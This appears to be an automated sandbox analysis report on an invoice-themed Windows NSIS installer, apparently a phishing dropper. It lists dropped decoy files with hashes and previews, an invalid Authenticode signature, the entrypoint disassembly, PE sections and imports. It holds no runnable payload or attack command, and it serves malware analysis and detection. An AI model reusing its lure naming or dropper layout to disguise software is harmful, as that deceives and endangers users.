SSDEEP:	384:x0ApQpUO7nJ9BGe8Gd+zZcrpqHCuY4TIm+io9fUe4KgZzZxrj2V+QRf4TGf:FypbJrGernrspY4s9fUKgpZxrahgTGf
MD5:	69FFEE981CA33B2B99A58323AE19A198
SHA1:	C9B1C33C92AE9BAE354B11A9F8F09639B7A8D493
SHA-256:	6623E3157B8615EBC31FE362C9058FFA9682A033822ED7A5E965A086D5F069A3
SHA-512:	ED48BD96F3D65CA8F3BDBDBEFDF2F40A29468326436D28E4F9B58FF3A7EFB06197525D55777277719270864AA7D5301F3E3478C86E944D3AD054542DA94084A4
Malicious:	false
Preview:	...................ddd.................??....::::..........................mmm.......33..................................HH.B.......................t...............\.,,./.................^...........Q.....................M.==...............;..........................................BBBB..........E..........1...666.f....hhh.........RRR.......+++..f......=...............:.......e........FF......R.TT............www..........:...........H.\|........#...w..........."..tt....`..+++...77..............t........}...........................FF...........MM...........&&.99..............F......\\......................................\|..............................W.......................ee.q.-...<<.........f.........6........9.qqq......I..............88.........P........hh.........!!!.\.0.............................................D....&.===.]]].....w..................7......uuu.......w...}.......%...................................v.......w......]]...............w.d......................VV......c.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\avatar-default-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.986245244009802
Encrypted:	false
SSDEEP:	6:tI9mc4slzc8SRIKMNo/aMhFl1OkUjq5eKVrGDVfqKlNK+:t4C8LKMuyMhPobjoprGDRlj
MD5:	8B727826F9D8C0C7C954EDE912CB0DEB
SHA1:	1518AA80747326B5353C22D32E57A33D61285119
SHA-256:	0783A7F518D3879C8F0F50B45FBD779A98652469E9B7C659CE41F14D1629D334
SHA-512:	0ABB243F9D1E0B6EDA0CB25D35C3449AB2B5B83078208F11B876A27FF11FF70B79F8BA97D4DA3AED21A8314C75FB2174D9378AF59B57DCB99DFF681D9AAB8561
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <path d="M8 1a3 3 0 100 6 3 3 0 000-6zM6.5 8A4.49 4.49 0 002 12.5V14c0 1 1 1 1 1h10s1 0 1-1v-1.5A4.49 4.49 0 009.5 8z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/>.</svg>.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\be.txt

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12193
Entropy (8bit):	4.4720152705808935
Encrypted:	false
SSDEEP:	192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
MD5:	3C21135144AC7452E7DB66F0214F9D68
SHA1:	B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
SHA-256:	D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
SHA-512:	0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
Malicious:	false
Preview:	.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\changes-allow-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	998
Entropy (8bit):	5.186938379246791
Encrypted:	false
SSDEEP:	24:t4CBGD0QNRWLLxo2em0yKbRAecFxV0/wXK:gDrc0NtAecFiH
MD5:	CB1EEE7BDB582B756D0F68EF02D6D96D
SHA1:	9E9B0F25BC472EF1C1C13EEAC12FD11C4CC0D2D9
SHA-256:	20EA767E852A8EBF2C5BA16D56CBAE10BD09D6CBA89B372A57EAA973AD3281B4
SHA-512:	E22FAEAE78D244A0F4E7215B31125D5AA4FD66C0720B0DE61D12084EAB879D7A9E231CCD5CD431417115B0945B450DC348DA400D67DB1898513B7BD6B9C274DB
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" fill="#474747"><path d="M3 9h10c.554 0 1 .446 1 1v3c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1v-3c0-.554.446-1 1-1z" style="marker:none" overflow="visible"/><path d="M7 0s-.709-.014-1.447.356C4.814.725 4 1.666 4 3v3h2V3c0-.667.186-.725.447-.855C6.71 2.014 7 2 7 2h2s.291.014.553.145c.261.13.447.188.447.855v8h2V3c0-1.333-.814-2.275-1.553-2.644C9.71-.014 9 0 9 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M2 12h12v4H2z" style="marker:none" overflow="visible"/></g></svg>

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\dotnet.api

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\ebook-reader.png

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	555
Entropy (8bit):	7.499536740374189
Encrypted:	false
SSDEEP:	12:6v/7anZhFxDEKwjAq0kaO/yvSL6T1pjNngLpzPanwmB9HE4JqSjF:5bDEPxdqKLmpqLdynw29kEqSZ
MD5:	BFF011148B773FA44B9A9BB029E8CC52
SHA1:	F2B838927E320D12649CEFDEA3AFE383C6650D7C
SHA-256:	B21DE7B432A7A67544D007ECC0FDD95F8E8C6129AF558A32102EE04C08635653
SHA-512:	A57C83AEE0E1F4C530D2F5B90589C31FD6E2FF8F62F998963284218FAC5EE164BCA7A619A9597DC3E2ECD0095A2CF04467E89EDF86700E1A90B3DF60B5121C9B
Malicious:	false
Preview:	.PNG........IHDR................a....IDATx......A....v...b.m.A..Q..Q..UD5.F.m.....fs{9.}...V.`....%.kt....R...+%7.}p..@.}:..u466`.6uu.tvv...N6....D"Q......po".;.4....W..g.b..\.~?...<.../.....$..5....................r.+..ah...F;.H.`b ....4.[...k.6.<..Kk.m[h..x`...R...z{.H.......Oax.e..{.........w._...c._>..6..THY.1! e.#....G......{.AB..l.K"..P(..j..$.R.}L.5.....@.>.......X...hE....L.."L.....=~..7n.2.,RJ.01.....B.AWW..<q......Ng.,../.Z...+...N].r.5.EB.p$..!,....,......SW.TD+U...K...ee._.N.[..`..1q..v\#6..?;7..4..3....IEND.B`.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\emblem-photos-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	680
Entropy (8bit):	5.109191824773878
Encrypted:	false
SSDEEP:	12:t4CP5GEA9xI7jhz4AeW02KdTwWjhz4AeW02KdTPqkoop4p:t4CBGEAgF4AeW0/N4AeW0/Zqg4p
MD5:	379690952AAA576521D51249D404CBCD
SHA1:	61A8A95B0454422AA47379CF983B99FFDD839439
SHA-256:	EAD402FB0B85DB153356EC695016FD4F2C4031367D8ED6D1C1EF5FF4F28A8DE8
SHA-512:	35B6BC866C3D02A2486D3447C82405103DE89D46940F7FE44A7009E714BBA57FBE601EEC939C3206ADB06FB31C4FD1D3822A0ED52A346ACFDE5908643432F928
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#474747"><path d="M13 5v2h1v5H4v2h12V5z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M0 2v9h12V2zm2 2h8v5H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M3 7c2.32 1 3.045-1.66 6 0v1H3z" style="marker:none" overflow="visible" opacity=".35"/></g></svg>

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\font-select-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	220
Entropy (8bit):	6.546211943247282
Encrypted:	false
SSDEEP:	6:6v/lhPysde0C1jngP3V95D2tOA/RDvhpLUxbVp:6v/7jC1zi3Sr/hW
MD5:	C84EE7522C124892455BB09DEBCF9340
SHA1:	AF87A2A5688346A3902762DD250328B7EF224620
SHA-256:	E0A3BD6FE1A1BAEFFE04BCA2980ADF755F888E31DCE3686B16C5DAC4202A38C8
SHA-512:	3BEED79366F15CD075781F677C0C9E84081D2189D1FB541A34AA25980B48701A3D93DC550E4ABEB550EFBE3167B1CAB8338E22F4603C6A71936876FBA75FAD58
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...=..P.../z.Q..Kx....l.b. )...x........t.......Y~.)......7......W.xk.'A...u.........%..!k.k5.\|E=+X..,,a.S.H4p*D8.8(FH.a..5.x...%.....7..8s:.......IEND.B`.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\network-wired-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.708279548998072
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllAoSF1/LvgStjP9f9uvJYUo+/JHt//sup:6v/lhPysKo21/Lvlt7V9+YUouJH1/jp
MD5:	1ED278AD206D6EA33FF787DD326E0FC5
SHA1:	8CFF7AD12FC0E5545E71D05879A0245BEDAF4D46
SHA-256:	CC88E76F7C7D2E5B07E49D1F2AD88F8BAFC0542EB11CEB2B2FFF235C87AB4417
SHA-512:	7291085B6153C02EDBF679CDDB93B97DBB74943F216EB622CE9722E02613269F626F8A7A5BE8DA683153E9AEE22C40ED7264E8A0ED62A99F477E2B96642596BF
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....GIDAT8.c`..0...O.Z&J]0.. ...&u]..5?......b....Q.E./.....t@..,....)1..,b...#.=....IEND.B`.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\pan-start-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	140
Entropy (8bit):	5.529383944212929
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllDM9vFW0p/sXm1MMos9DwlTYTbklt/sbp:6v/lhPysx8vFW0pkX4iZlTYTI3Ebp
MD5:	4308BBBAB1DB146494AE5ABB07B8E6DB
SHA1:	58121574EEB070E26DDD75A964F3548E176E58A4
SHA-256:	EFB732049C674EB25BFCB2FA0CBCC45D24190BF1479C054647F424B31E34C828
SHA-512:	41C9B37516F8D6AB7155F890EE36C26FE4161383A93BFBF696AB18292774C3556642E898361D21CECCBFEFFAF5814495CFAC2C74791E02F068B055BD3AD87DE4
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....CIDAT8.c`.J..R..(...\.`..2.Y3...k.i......b..PN.....J.@6.l.`.Pd..A.....O...D....IEND.B`.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\printer-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	147
Entropy (8bit):	5.834297280344084
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
MD5:	38D787F55E22FB591135F9250CD259D4
SHA1:	0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
SHA-256:	1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
SHA-512:	4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79\pt-br.txt

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	9515
Entropy (8bit):	5.04214621707661
Encrypted:	false
SSDEEP:	192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
MD5:	7B02E1AE16E2E709D7C97DE560B4DBE9
SHA1:	191A54644417F7D36F5CB4182DCDB3737D74BE51
SHA-256:	DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
SHA-512:	4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
Malicious:	false
Preview:	.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\omfartsvejene\Reberbanernes\Muhamedaneres\Sminknings\LogoCanary.png

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	16669
Entropy (8bit):	7.836876926418697
Encrypted:	false
SSDEEP:	384:dg1Ew+1FT+/6trrKWzge5jh2xmalhctpNy:W1E1c6tru1CUYa4tDy
MD5:	F80867A421C85C6E2865CF85FF7C4B02
SHA1:	C3EAB6B7E92646FE3407B2B3C5AFFE13A7873C48
SHA-256:	BCAA3B1333919176137D4DE4B1E3F31126159B12F959D7277BD8537B95139BD3
SHA-512:	06B51E660AEE86FC3BB068C6DEA046920E04F86B8EDD02E640EAC619F0F0D7E87E5CAE5BE1390CEBC5DFE70AA13BAB1710176E88C9D1C859182629D429745D78
Malicious:	false
Preview:	.PNG........IHDR...X...X......f......tEXtSoftware.Adobe ImageReadyq.e<..@.IDATx.....\.}..../...].{`.......D.\..u......#..V.eW.G>"W....V..d..IVU".:.D<$J.....{q/.....`0g./..z....A.`..?..p....M......._.'...L...]~.....;.........,..... ....X.....@`.. ..........@`...,..... ....X.....@`.. ..........@`...,..........X.....@`.. ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X...,..... ..........@`...,..........X...,..... ....~.....N...@...C{..o.?2.....x...?_....sC..O8...n..J.ttbv9...w~...ym..O.......vq"f..qrjt9... ..].S..Hz.gf}.,.Sm!...>..Xh..:S.};d.....2..?.......2...1..ep...K.{.?..@`.7=...7U..C......S...6....\|a.}].._..d....,_.........+__..JS.....X.u...;..Q.x.z9...eP5f.H..nnz.&h...4.kz......&....o)..=..x.=...y ....6i...wL.....Y(.2NRP..J...HL/K#^izqpbUp}...q...g.......".....4R..#.VFrR\|.LF>w~.Pm..\..4.5t{.-..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.556713515266732
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ePAY-Advice_Rf[UC7749879100].exe
File size:	329072
MD5:	06bf8620598b674fc3506a2844d42d65
SHA1:	00e28bd96e338f7bfff9c41d985de05f010d8ea7
SHA256:	98883d7d2678fd8cbdad8b8c1ca7cf13a797b1074f081dee24aba14dcc346ffe
SHA512:	d1e49bf22a28b2521f5ddfe4e0da6a40ebd599a3284f9d25b791e0ded05918e615ed4d65fe5d49c588fcc61e05cd2a80374ebfe94ceed972e5490d255f28dae7
SSDEEP:	6144:iDk/kgv+gAz2TU8tpVy+cofgwCNW8J++jMJnq2UroIbvt:ztD42TU8DdcjNFJgJnqbrh1
TLSH:	4C64F14176A1C823FD6A4630CD91E5F3E1BAFE04C828D10773A13FAFB9352858555EBA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........

File Icon


Icon Hash:	08c2b0d8cc64b046

Static PE Info

General

Entrypoint:	0x4031d6
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=spinulation@Johnsen.fo, OU="Releaser Regionplanlov Ellwood ", O=Blodkrftens, L=Fleuriel, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	9/9/2022 1:19:43 AM 9/8/2025 1:19:43 AM
Subject Chain	E=spinulation@Johnsen.fo, OU="Releaser Regionplanlov Ellwood ", O=Blodkrftens, L=Fleuriel, S=Auvergne-Rh\xf4ne-Alpes, C=FR
Version:	3
Thumbprint MD5:	E72625F2F2E4D81D13EEADD636799AE5
Thumbprint SHA-1:	96AB23C902D117D7E57A617EE5CD324FD5CFB328
Thumbprint SHA-256:	4DD00D1164E5A3B45C21C6B0ACA7CDE02DF5C70EBD4F95F3736AD2784DC2D5E4
Serial:	16E55C1D2183D78DF9C4B28EDF378EDD20F08352

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A0h]
call dword ptr [0040709Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042370Ch], eax
je 00007FA1BCC81C53h
push ebx
call 00007FA1BCC84D2Ah
cmp eax, ebx
je 00007FA1BCC81C49h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FA1BCC84CA6h
push esi
call dword ptr [00407098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FA1BCC81C2Dh
push 0000000Ah
call 00007FA1BCC84CFEh
push 00000008h
call 00007FA1BCC84CF7h
push 00000006h
mov dword ptr [00423704h], eax
call 00007FA1BCC84CEBh
cmp eax, ebx
je 00007FA1BCC81C51h
push 0000001Eh
call eax
test eax, eax
je 00007FA1BCC81C49h
or byte ptr [0042370Fh], 00000040h
push ebp
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407178h]
push 00409188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x36000	0xa3c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4fb50	0xa20
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5f0d	0x6000	False	0.6649169921875	data	6.450520423955375	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1248	0x1400	False	0.4275390625	data	5.007650149182371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	False	0.6376953125	data	5.129587811765307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x12000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x36000	0xa3c0	0xa400	False	0.0760766006097561	data	1.8822021165260459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x36268	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x365d0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 0	English	United States
RT_DIALOG	0x3fa78	0x144	data	English	United States
RT_DIALOG	0x3fbc0	0x13c	data	English	United States
RT_DIALOG	0x3fd00	0x120	data	English	United States
RT_DIALOG	0x3fe20	0x11c	data	English	United States
RT_DIALOG	0x3ff40	0xc4	data	English	United States
RT_DIALOG	0x40008	0x60	data	English	United States
RT_GROUP_ICON	0x40068	0x14	data	English	United States
RT_MANIFEST	0x40080	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
